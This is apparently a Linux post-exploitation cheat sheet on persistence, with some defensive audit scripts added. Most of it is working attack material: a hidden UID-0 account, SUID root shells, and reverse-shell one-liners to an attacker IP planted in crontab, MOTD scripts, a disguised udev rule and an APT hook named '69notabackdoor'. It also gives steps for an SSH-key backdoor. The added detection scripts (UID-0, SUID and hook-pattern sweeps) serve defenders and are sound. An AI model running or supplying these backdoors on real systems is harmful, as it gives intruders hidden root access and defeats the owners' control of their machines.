Linux Persistence
2024-03-05 21:01:12

Account Creation

# Add a second UID-0 account. -o allows the duplicate UID and -g 0 puts it in the
# root group; it shows up in /etc/passwd as a UID-0 entry whose name is not "root".
sudo useradd -ou 0 -g 0 kage
sudo passwd kage                         # interactive
echo "kage" | sudo passwd --stdin kage   # non-interactive; --stdin exists on RHEL/Fedora, not on Debian/Ubuntu

# Add a normal user and put it in the sudo group (wheel on RHEL/Arch)
sudo adduser kage
sudo usermod -aG sudo kage

SUID

Set shell to SUID

chmod +s /bin/bash   # sets the setuid (and setgid) bit on the root-owned shell
/bin/bash -p         # -p keeps euid 0; without it bash drops privileges when euid != uid

Custom SUID binary

TMPDIR2="/var/tmp"
cat > $TMPDIR2/notevil.c <<'EOF'
#define _GNU_SOURCE          /* setresuid() is a GNU extension */
#include <stdlib.h>
#include <unistd.h>
/* set real, effective and saved UID to 0 so the spawned shell keeps root
   (bash would otherwise drop an effective UID that differs from the real one) */
int main(void) { setresuid(0, 0, 0); system("/bin/sh"); return 0; }
EOF
gcc $TMPDIR2/notevil.c -o $TMPDIR2/notevil 2>/dev/null
rm $TMPDIR2/notevil.c
chown root:root $TMPDIR2/notevil   # needs root: the setuid bit only grants the owner's UID
chmod 4755 $TMPDIR2/notevil        # after chown, which clears setuid; a plain chmod +x does NOT set it, and 4777 lets anyone overwrite the file
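
The checks a defender runs for the two techniques above, as an added example that is not part of the original cheat sheet: it parses a passwd/group file for extra UID-0 accounts and sudo/wheel members, and walks a directory tree for setuid/setgid files. The file paths and the sample data are constructed here so it runs without root; on a real host point it at /etc/passwd, /etc/group and / instead.

```shell
#!/usr/bin/env bash
# Added example (not from the original cheat sheet): audit for the account and
# SUID artefacts described above, against constructed sample data.
set -u

# Print every login with UID 0 other than "root" from a passwd-format file.
find_uid0_accounts() {
    local passwd_file="$1"
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$passwd_file"
}

# Print "group:member" for members of the privileged groups (sudo on Debian,
# wheel on RHEL/Arch) from a group-format file.
find_sudoers_group_members() {
    local group_file="$1"
    awk -F: '($1 == "sudo" || $1 == "wheel") && $4 != "" {
                 n = split($4, m, ","); for (i = 1; i <= n; i++) print $1 ":" m[i] }' "$group_file"
}

# Print setuid/setgid regular files under a tree; -perm /6000 matches if either
# bit is set, -xdev keeps the walk on one filesystem.
find_setuid_files() {
    local root="$1"
    find "$root" -xdev -type f -perm /6000 2>/dev/null | sort
}

# Number of setuid/setgid files, convenient for a baseline-vs-now diff.
count_setuid_files() {
    find_setuid_files "$1" | grep -c . || true
}

# --- constructed sample data (not taken from a real host) ---
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kage:x:0:0::/home/kage:/bin/bash
alice:x:1000:1000::/home/alice:/bin/bash
EOF

SAMPLE_GROUP=$(mktemp)
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:alice,kage
wheel:x:10:
EOF

SAMPLE_TREE=$(mktemp -d)
mkdir -p "$SAMPLE_TREE/var/tmp" "$SAMPLE_TREE/usr/bin"
printf '#!/bin/sh\n' > "$SAMPLE_TREE/var/tmp/notevil"
printf '#!/bin/sh\n' > "$SAMPLE_TREE/usr/bin/harmless"
chmod 4755 "$SAMPLE_TREE/var/tmp/notevil"   # setuid, like the binary above
chmod 0755 "$SAMPLE_TREE/usr/bin/harmless"  # ordinary executable, must not be reported

echo "UID-0 accounts besides root:"; find_uid0_accounts "$SAMPLE_PASSWD"
echo "sudo/wheel members:";          find_sudoers_group_members "$SAMPLE_GROUP"
echo "setuid/setgid files:";         find_setuid_files "$SAMPLE_TREE"
```

On a live system the interesting output is the diff against a known-good baseline: a setuid file under /var/tmp or /dev/shm, or any UID-0 login besides root, is a finding on its own.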

Crontab

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed

# Time spec "nicknames"
@reboot : Run once after reboot.
@yearly : Run once a year, i.e. "0 0 1 1 *".
@annually : Run once a year, i.e. "0 0 1 1 *".
@monthly : Run once a month, i.e. "0 0 1 * *".
@weekly : Run once a week, i.e. "0 0 * * 0".
@daily : Run once a day, i.e. "0 0 * * *".
@hourly : Run once an hour, i.e. "0 * * * *".
# Use `crontab` for a specific user's table (no user-name field).
# Write to /etc/crontab or a file in /etc/cron.d/ for system-wide jobs: needs root and the user-name field.
# Cron runs jobs with /bin/sh, so the bash-only `>& /dev/tcp/...` redirect has to be wrapped in `bash -c`.

# On reboot. `crontab -l` fails if the user has no table yet, hence 2>/dev/null;
# `crontab -` installs the merged table from stdin.
(crontab -l 2>/dev/null; echo "@reboot sleep 20 && /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'") | crontab -

# Every minute (reconnects whenever the shell dies, at the cost of a noisy cron log)
(crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'") | crontab -

# Other schedules
* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'   # every minute
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1' # every 5 minutes

Message of the Day (MOTD)

Debian-based (Ubuntu, etc.): pam_motd runs every script in /etc/update-motd.d/ as root on each login, so a command appended to one of them executes with root privileges. Background it, otherwise the login hangs until the shell exits.
/etc/update-motd.d/00-header

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.69/4444 0>&1" &' >> /etc/update-motd.d/00-header

Everyone else: scripts in /etc/profile.d/ are sourced by every login shell, but as the logging-in user, so the shell comes back with that user's privileges rather than root.
/etc/profile.d/motd.sh

Driver Backdoor (udev rule)

A rule in /etc/udev/rules.d/ with RUN+= is executed as root every time a matching device event fires, here any USB device being plugged in. udev runs RUN programs without a shell and kills whatever is still running once the event has been handled, so a bare reverse shell dies almost immediately; handing it to systemd-run puts it in its own transient unit that outlives the event. udevd picks up new rules files on its own.

RSHELL="bash -i >& /dev/tcp/10.0.0.69/4444 0>&1"
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"/usr/bin/systemd-run /bin/bash -c '$RSHELL'\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

APT Backdoor

If you can write a file into /etc/apt/apt.conf.d/ containing APT::Update::Pre-Invoke {"CMD"};, CMD runs as root the next time apt-get update runs, whether an admin or a scheduled job triggers it. Background it with nohup ... & so apt does not block on the shell.

echo 'APT::Update::Pre-Invoke {"nohup bash -c '\''bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'\'' &"};' > /etc/apt/apt.conf.d/69notabackdoor
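
The crontab, MOTD, udev and APT techniques above all write to a handful of root-owned hook locations, so one sweep covers them. The following is an added example, not part of the original cheat sheet: it takes a root prefix so that it runs here against a constructed directory tree (with planted entries mirroring the four techniques plus benign lines that must not fire) and on a real host against "/". The indicator pattern is an assumption drawn from the commands on this page; extend it with your own.

```shell
#!/usr/bin/env bash
# Added example, not from the original cheat sheet: one sweep over the hook
# locations used by the crontab, MOTD, udev and APT techniques above.
set -u

# Paths (relative to the prefix) whose contents get executed as root, or as
# the logging-in user in the case of profile.d.
HOOK_PATHS="etc/crontab etc/cron.d var/spool/cron etc/update-motd.d etc/profile.d etc/udev/rules.d etc/apt/apt.conf.d"

# Indicators taken from the techniques above (assumed starting set, extend it).
HOOK_PATTERN='/dev/tcp/|nc (-e|-c) |bash -i|RUN\+=|(Pre|Post)-Invoke'

# Print "file:line:text" for each matching line under the prefix.
hunt_persistence_hooks() {
    local prefix="${1%/}" p
    for p in $HOOK_PATHS; do
        [ -e "$prefix/$p" ] || continue
        grep -rHnE "$HOOK_PATTERN" "$prefix/$p" 2>/dev/null || true
    done
}

# Number of hits, handy for a baseline-vs-now comparison.
count_persistence_hits() {
    hunt_persistence_hooks "$1" | grep -c . || true
}

# --- constructed sample tree (not a real host) ---
SAMPLE_ROOT=$(mktemp -d)
mkdir -p "$SAMPLE_ROOT/etc/cron.d" "$SAMPLE_ROOT/var/spool/cron/crontabs" \
         "$SAMPLE_ROOT/etc/update-motd.d" "$SAMPLE_ROOT/etc/udev/rules.d" \
         "$SAMPLE_ROOT/etc/apt/apt.conf.d"

# Planted entries mirroring the four techniques
cat > "$SAMPLE_ROOT/var/spool/cron/crontabs/root" <<'EOF'
@reboot sleep 20 && /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'
EOF
cat > "$SAMPLE_ROOT/etc/update-motd.d/00-header" <<'EOF'
#!/bin/sh
printf "Welcome to %s\n" "$(uname -o)"
bash -c "bash -i >& /dev/tcp/10.0.0.69/4444 0>&1" &
EOF
cat > "$SAMPLE_ROOT/etc/udev/rules.d/71-vbox-kernel-drivers.rules" <<'EOF'
ACTION=="add",ENV{DEVTYPE}=="usb_device",SUBSYSTEM=="usb",RUN+="/usr/bin/systemd-run /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'"
EOF
cat > "$SAMPLE_ROOT/etc/apt/apt.conf.d/69notabackdoor" <<'EOF'
APT::Update::Pre-Invoke {"nohup bash -c 'bash -i >& /dev/tcp/10.0.0.69/4444 0>&1' &"};
EOF

# Benign content that must not fire
cat > "$SAMPLE_ROOT/etc/crontab" <<'EOF'
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
EOF
cat > "$SAMPLE_ROOT/etc/apt/apt.conf.d/20auto-upgrades" <<'EOF'
APT::Periodic::Update-Package-Lists "1";
EOF

hunt_persistence_hooks "$SAMPLE_ROOT"
```

Run as `hunt_persistence_hooks /` on a live host; the planted tree yields exactly the four lines written by the techniques above and nothing from the benign crontab and APT files. A pattern match is a lead, not a verdict: follow each hit with a look at the file's mtime, owner and, on Debian, `dpkg -S` to see whether a package owns it.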

SSH Backdoor

Add a key to the target's ~/.ssh folder

  1. ssh-keygen on the attacking machine (-t ed25519 for a modern key)
  2. append the .pub line to ~/.ssh/authorized_keys on the target
  3. set the permissions sshd's StrictModes expects: 700 for ~/.ssh and 600 for authorized_keys; the private key (id_rsa or id_ed25519) stays on the attacking machine with mode 600
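
The three steps above as one idempotent function, followed by the permission check sshd's StrictModes performs, as an added example that is not part of the original cheat sheet. It works on any home directory, so the demo uses a temporary one, and the public key it installs is a constructed placeholder rather than real key material.

```shell
#!/usr/bin/env bash
# Added example, not from the original cheat sheet: install an authorized key
# with the right modes, without duplicating it on re-runs, and verify the modes.
set -u

# Append one public-key line to $home/.ssh/authorized_keys unless already
# present; create the directory and file with the modes sshd wants
# (StrictModes refuses group/world-writable .ssh or authorized_keys).
install_authorized_key() {
    local home="$1" pubkey="$2"
    local dir="$home/.ssh" file="$home/.ssh/authorized_keys"
    mkdir -p "$dir" && chmod 700 "$dir"
    [ -f "$file" ] || : > "$file"
    chmod 600 "$file"
    grep -qxF -- "$pubkey" "$file" || printf '%s\n' "$pubkey" >> "$file"
}

# Number of key lines in authorized_keys (blank and comment lines ignored).
count_authorized_keys() {
    grep -cvE '^[[:space:]]*(#|$)' "$1/.ssh/authorized_keys" 2>/dev/null || true
}

# Octal modes of .ssh and authorized_keys as "700 600", or "missing".
ssh_perms() {
    local dir="$1/.ssh" file="$1/.ssh/authorized_keys"
    if [ -d "$dir" ] && [ -f "$file" ]; then
        printf '%s %s\n' "$(stat -c %a "$dir")" "$(stat -c %a "$file")"
    else
        echo missing
    fi
}

# --- demo with a temporary home and a constructed (not real) public key ---
SAMPLE_HOME=$(mktemp -d)
SAMPLE_PUBKEY='ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExampleKeyNotRealMaterial kage@example'
install_authorized_key "$SAMPLE_HOME" "$SAMPLE_PUBKEY"
install_authorized_key "$SAMPLE_HOME" "$SAMPLE_PUBKEY"   # re-run must not add a duplicate
echo "keys: $(count_authorized_keys "$SAMPLE_HOME"), modes: $(ssh_perms "$SAMPLE_HOME")"
```

With a real key, generate it non-interactively on the attacking side with `ssh-keygen -t ed25519 -N '' -f ./key` and pass the contents of `key.pub` as the second argument. On the defensive side, `count_authorized_keys` and `ssh_perms` over every home directory plus /root is a quick way to spot a key that nobody remembers adding.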